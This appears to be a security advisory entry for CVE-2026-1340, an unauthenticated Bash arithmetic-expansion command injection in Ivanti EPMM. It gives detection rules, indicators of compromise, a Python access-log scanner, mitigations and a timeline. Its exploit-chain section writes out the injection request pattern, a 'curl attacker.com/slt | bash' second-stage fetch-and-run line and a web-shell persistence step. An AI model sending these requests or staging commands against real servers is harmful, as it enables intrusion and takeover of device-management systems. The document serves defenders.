TP-EXP-2026-0003 | CVE-2026-1340 | critical | Patched | Under Review

Ivanti EPMM Code Injection — Bash Arithmetic Expansion RCE

CVE: CVE-2026-1340
Platform: Ivanti EPMM ≤ 12.7.0.0
Type: RCE
Severity: CRITICAL
Status: Patched
Zero-Day: Confirmed
Disclosed: January 29, 2026
Patched: January 29, 2026
Researcher: Ivanti (internal)
CISA KEV: Listed

Severity Assessment

  • Exploitability: 9.5/10 — Unauthenticated RCE via HTTP GET; no credentials required; PoC public within 1 day of disclosure
  • Impact: 9/10 — Arbitrary OS command execution on EPMM MDM server controlling enterprise endpoint fleet
  • Weaponization Risk: 9/10 — Mass automated exploitation observed; web shells, cryptominers, and backdoors deployed at scale
  • Patch Urgency: 9.5/10 — CISA KEV listed; federal mandatory remediation; MDM compromise enables mass endpoint policy abuse
  • Detection Coverage: 5.5/10 — Exploitation traffic blends with normal MDM API calls; web shell and cryptominer artifacts detectable post-compromise

Summary

Twin critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) allow unauthenticated remote code execution through Bash command injection. Attackers inject malicious commands via HTTP GET requests to the application distribution endpoints (/mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/). The root cause is improper handling of attacker-controlled input within Bash scripts used by EPMM, specifically arithmetic expansion in the map-appstore-url script.

Initially disclosed as affecting “a very limited number of customers,” Unit 42 later observed widespread automated exploitation including web shells, cryptominers, and persistent backdoors. CISA added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog on April 8, 2026. Organizations running EPMM ≤ 12.7.0.0 are at critical risk and should apply patches immediately or restrict network access to affected systems.

Exploit Chain

  1. Target Discovery: Attacker identifies internet-facing Ivanti EPMM instances via Shodan/Censys scanning or automated reconnaissance.
     shodan search “Ivanti EPMM” | censys search “EPMM”

  2. Payload Crafting: Malicious Bash commands are embedded in HTTP GET request parameters targeting the /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/ endpoints using arithmetic expansion syntax.
     GET /mifs/c/appstore/fob/?param=$(command) HTTP/1.1

  3. Arithmetic Expansion Abuse: EPMM’s map-appstore-url Bash script processes the attacker-controlled value through arithmetic expansion, enabling OS command injection and arbitrary code execution.
     $(($(malicious_command)))

  4. Second-Stage Delivery: The exploited system downloads and executes an /slt script payload from an attacker server, installing a web shell, cryptominer, or persistent backdoor.
     curl attacker.com/slt | bash

  5. Persistence: Attackers establish persistent access via web shells and backdoors on the compromised EPMM server, maintaining remote access across reboots.
     chmod +x /var/www/shell.php && crontab -e

Detection Guidance

Detection Rule | Behavioral Indicator | Confidence
SIEM Rule: HTTP Parameter Analysis | HTTP GET requests to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ with unusual parameters | High
Network Signature: Outbound Downloads | Outbound connections from the EPMM server to unknown IPs downloading /slt script payloads | High
Endpoint Indicator: Web Shell Detection | Web shell files deployed on the EPMM server filesystem (new PHP/JSP files in EPMM web directories) | High
Process Monitor: Anomalous Child Processes | Unexpected child processes spawned by the EPMM application server (bash/sh spawned from the Java/Tomcat process tree) | High
Crypto Detection: Resource Anomalies | Sustained high CPU utilization on EPMM servers together with network connections to mining pools | Medium

Indicators of Compromise

  • Malicious HTTP GET requests to /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/ with shell metacharacters or $(...) / $((...)) expansion syntax in the parameters
  • Outbound downloads of /slt script from EPMM server to attacker-controlled infrastructure
  • Unauthorized web shell files in /var/www/, /opt/epmm/tomcat/webapps/, or temp directories
  • Anomalous child processes spawned by EPMM Tomcat/Java process tree (bash/sh with unexpected arguments)
  • Sustained high CPU on EPMM servers with cryptominer network connections to mining pool infrastructure
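As an added example (not code from the advisory or from Ivanti), the following Python implements the SIEM rule and first IoC above over web-server access-log lines: it flags GET requests to the two FOB endpoints whose decoded query string carries $( / $(( / ${ / backtick / ; / | tokens, decoding twice so double-encoded requests are not missed. The combined log format, the token list and the sample lines are assumptions; the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Application distribution endpoints named in the advisory.
TARGET_PATHS = ("/mifs/c/appstore/fob/", "/mifs/c/aftstore/fob/")

# Tokens that have no business in a legitimate FOB query string:
# $(...) / $((...)) expansion, ${...}, backticks, and ; or | separators.
# '&' is deliberately excluded because it separates ordinary query parameters.
SHELL_TOKENS = re.compile(r"\$\(\(?|\$\{|`|[;|]")

# Combined log format as written by Apache/nginx-style front ends (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def check_request(line):
    """Return the matched shell token for a GET to a FOB endpoint whose
    decoded query contains one, or None if the line is unremarkable."""
    m = LOG_RE.match(line)
    if m is None or m.group("method") != "GET":
        return None
    path, _, query = m.group("target").partition("?")
    if not path.startswith(TARGET_PATHS):
        return None
    # Decode twice so %2524%2528 (double-encoded "$(") is still caught.
    decoded = unquote(unquote(query))
    hit = SHELL_TOKENS.search(decoded)
    return hit.group(0) if hit else None

def scan(lines):
    """Return (client ip, decoded target, token) for every suspicious line."""
    findings = []
    for line in lines:
        token = check_request(line)
        if token is not None:
            m = LOG_RE.match(line)
            findings.append((m.group("ip"), unquote(unquote(m.group("target"))), token))
    return findings

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Mar/2026:10:01:02 +0000] "GET /mifs/c/appstore/fob/?id=12345&lang=en HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Mar/2026:10:02:17 +0000] "GET /mifs/c/appstore/fob/?param=%24%28echo%20probe%29 HTTP/1.1" 200 44',
    '198.51.100.9 - - [15/Mar/2026:10:03:41 +0000] "GET /mifs/c/aftstore/fob/?param=%2524%2528%2528echo%2520probe%2529%2529 HTTP/1.1" 500 0',
    '10.0.0.8 - - [15/Mar/2026:10:04:00 +0000] "POST /mifs/c/appstore/fob/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, target, token in scan(SAMPLE_LOG):
        print(f"ALERT {ip} {token!r} in {target}")
```

Only the two FOB endpoints are scoped here, matching the rule above; widen TARGET_PATHS if the same tokens should be flagged on every EPMM path.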

Recommended Mitigations

  1. Apply RPM Patches — Install version-specific RPM patches for EPMM 12.5.x–12.7.x immediately. Note: patches do not survive upgrades; plan full upgrade to 12.8.0.0.
  2. Upgrade to 12.8.0.0 — Permanent fix for both CVE-2026-1281 and CVE-2026-1340; recommended long-term remediation.
  3. Network Isolation — Restrict the EPMM management interface from internet access; enforce VPN or zero-trust controls; limit inbound firewall rules to trusted networks.
  4. Web Shell Scan — Scan EPMM filesystem for unauthorized web shells/backdoors in web-accessible directories.
  5. Monitor Exploitation Endpoints — Deploy WAF/IDS signatures to detect malicious requests with arithmetic expansion syntax targeting app distribution endpoints.

Disclosure Timeline

● 2026-01-29 Ivanti Discloses Vulnerability: Ivanti discloses CVE-2026-1281 and CVE-2026-1340, noting exploitation of “a very limited number of customers.” The initial advisory recommends immediate patching.

● 2026-01-30 PoC Code Released: Public proof-of-concept exploitation code becomes available, enabling broader exploitation attempts by threat actors.

● 2026-02-01 Horizon3.ai Analysis: Horizon3.ai publishes a detailed technical analysis and exploitation walkthrough, significantly lowering the barrier to exploitation.

● 2026-03-15 Mass Exploitation Observed: Unit 42 and Deutsche Telekom Security report widespread automated mass exploitation across multiple countries, including deployment of web shells, cryptominers, and persistent backdoors.

● 2026-04-08 CISA KEV Addition: CISA adds CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog, officially confirming active exploitation in the wild and escalating priority for federal agencies.
